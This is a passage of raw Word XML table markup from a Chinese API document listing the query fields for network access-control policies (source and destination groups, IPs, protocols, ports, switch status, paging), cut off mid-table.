      <w:tr w:rsidR="00497C54" w14:paraId="58FF4BC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9985B48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F2C81F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F44DD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575AFF41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33B0A1C9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550A47F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0676A2B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="104C5EB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CDA09A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22097094" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A3B6142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730ECE28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A07C2AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36C44149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id集合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DA25AD2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F30962F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65FE80A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9AA956" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B5F2F32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="48B34D24" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4882F2F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstGroupIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62AFF546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13616ED3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE559D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C180811" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21A329FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstTagIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8E5C1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7003B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="374BA57A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26562A1B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FA70B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C2A565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10500536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E4A335" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E2AD503" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529A1F54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcGroupIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB0CB54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0275525A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E4EB7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E4E5E8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3A79DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcTagIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A618F05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB858BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A30D453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E0F5358" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8E1E5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A2FB923" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DE6E60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573D19B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0204D867" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CFD5214" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D428D73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D3959DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3901C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="109B716C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EEE9CFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7309913E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5115E79E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5063680C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6505AB32" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="365B06A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1A8337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D28B350" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D73F833" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3586B163" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258581F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD6E028" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07621DB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1A1439" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4917A593" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B500546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17E70DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>TimeRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160CDE44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B7828A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5BA656FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B37D025" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>displayPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1738E9D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D6ED09D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F460123" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06546FB7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1763CF07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B09EBF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76AEA4A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EF2B14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00A61E60" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="704E83F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F297552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4486957E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A21E048" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41E78410" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE7F1DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00366C7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42EC4462" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D08490D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69C23BE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TimeRange字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="645"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="642535C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B80911D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E4BE5F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C22C2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0349FC29" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028CEA24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
